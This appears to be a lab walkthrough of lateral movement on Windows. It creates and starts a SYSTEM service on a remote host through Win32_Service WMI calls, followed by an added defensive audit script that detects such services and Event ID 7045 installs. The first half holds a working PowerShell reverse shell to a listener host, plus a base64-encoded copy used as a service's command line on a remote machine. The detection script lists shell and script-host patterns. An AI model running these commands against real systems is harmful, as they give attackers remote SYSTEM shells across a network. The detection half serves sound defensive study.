Lateral Movement: Command Execution via Win32_Service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods

Create a service:

PS C:\Users\victim6\Downloads> $servicetype = [byte] 16

PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, "Windows performance", $errorcontrol, $null, $null, "WinPerf", "C:\Windows\System32\calc.exe", $null, $servicetype, "Manual", "NT Authority\system", " "

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter 'name = "WinPerf"'

Start the service:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter 'name = "WinPerf"' | Invoke-WmiMethod -name startservice

Remove the service:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter 'name = "WinPerf"' | Remove-WmiObject

On another PS shell:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> Set-ExecutionPolicy RemoteSigned

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> . .\powercat.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> powercat -l -v -p 443 -t 1000

Abusing service creation:

Reverse shell:

$client = New-Object System.Net.Sockets.TCPClient("192.168.222.130",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encoded reverse shell value:


PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_service -name create -ArgumentList $false, "windows performance", $errorcontrol, $null, $null, "WinPerf", "c:\windows\system32\cmd.exe  /c powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTkyLjE2OC4yMjIuMTMwIiw0NDMpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICJQUyAiICsgKHB3ZCkuUGF0aCArICI+ICI7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk=", $null, $servicetype, "manual", "nt authority\system", "" -computername 192.168.222.144 -credential SECURITY\administrator

PS C:\Users\victim6\Downloads> Get-WmiObject -Class win32_service -Filter 'name = "WinPerf"' -ComputerName 192.168.222.144 | Invoke-WmiMethod -name startservice

This way we get the shell at the listener end.
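From the defender's side, a service created through Win32_Service.Create looks the same as one created with sc.exe: the Service Control Manager writes Event ID 7045 ("A service was installed in the system") to the System log of the target host, and the service's PathName stays visible in Win32_Service until it is removed. The following audit script is an added example, not part of the original post or of powercat. It flags services whose PathName is a one-shot command (cmd.exe /c, encoded PowerShell, script hosts) rather than a real daemon, decodes any -EncodedCommand payload for the analyst, and pulls recent 7045 events. The Event ID and the EventData field names (ServiceName, ImagePath, ServiceType, StartType, AccountName) are real Windows identifiers; the suspicious-pattern list and the function names are assumptions of this example. The decoder tries UTF-16LE first, which is what -EncodedCommand expects, and falls back to ASCII for payloads that were base64-encoded from plain text.

```powershell
# Added example (not from the original post): audit services created the way
# the "WinPerf" service above was, and surface the matching install events.

function Expand-EncodedCommand {
    # Decode a "powershell -e <base64>" payload found in a service PathName.
    # -EncodedCommand (abbreviations -e, -ec, -enc) carries UTF-16LE text.
    param([string]$CommandLine)
    if (-not ($CommandLine -match '\s-e(c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')) { return $null }
    try {
        $raw = [Convert]::FromBase64String($Matches[2])
    } catch {
        return '<not valid base64>'
    }
    $text = [Text.Encoding]::Unicode.GetString($raw)
    # A payload encoded from ASCII/UTF-8 text decodes to unprintable characters
    # under UTF-16LE; fall back so the analyst still sees the command.
    if ($text -match '[^\x09\x0A\x0D\x20-\x7E]') {
        $text = [Text.Encoding]::ASCII.GetString($raw)
    }
    return $text
}

function Get-SuspiciousService {
    # Assumed patterns: service binaries that are really a command line, not a daemon.
    param([string]$ComputerName = $env:COMPUTERNAME)
    $patterns = @(
        'cmd(\.exe)?\s+/[ck]\s',                   # cmd.exe /c or /k <command>
        'powershell(\.exe)?.*\s-e(c|n[a-z]*)?\s',   # encoded PowerShell command
        'powershell(\.exe)?.*\s-(nop|noprofile)\s', # profile suppression, common in one-liners
        '\b(rundll32|regsvr32|mshta|wscript|cscript)(\.exe)?\b'
    )
    Get-CimInstance -ClassName Win32_Service -ComputerName $ComputerName | ForEach-Object {
        $path = $_.PathName
        $hits = @($patterns | Where-Object { $path -match $_ })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Name        = $_.Name
                DisplayName = $_.DisplayName
                StartName   = $_.StartName      # LocalSystem is the high-impact case
                StartMode   = $_.StartMode
                PathName    = $path
                Decoded     = Expand-EncodedCommand $path
            }
        }
    }
}

function Get-ServiceInstallEvent {
    # Recent 7045 events from the System log; each one is a service installation.
    param([string]$ComputerName = $env:COMPUTERNAME, [int]$Hours = 24)
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Computer    = $_.MachineName
                ServiceName = $data['ServiceName']
                ImagePath   = $data['ImagePath']
                ServiceType = $data['ServiceType']
                StartType   = $data['StartType']
                AccountName = $data['AccountName']
                Decoded     = Expand-EncodedCommand $data['ImagePath']
            }
        }
}

# Usage: run on the host being audited, or pass -ComputerName for a remote host.
Get-SuspiciousService | Format-List
Get-ServiceInstallEvent -Hours 48 |
    Where-Object { $_.ImagePath -match 'cmd|powershell|rundll32|regsvr32|mshta|w?cscript' } |
    Format-Table Time, ServiceName, AccountName, ImagePath -AutoSize
```

Note that a service created with Invoke-WmiMethod -ComputerName is installed on the remote host, so the 7045 event lands in that host's System log, not on the machine the cmdlet was run from; forward those logs centrally if you want to catch this pattern across the estate. Deleting the service with Remove-WmiObject removes the Win32_Service entry but not the 7045 event, which is why the event query is worth running even when the service audit comes back clean.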

@Saksham Dixit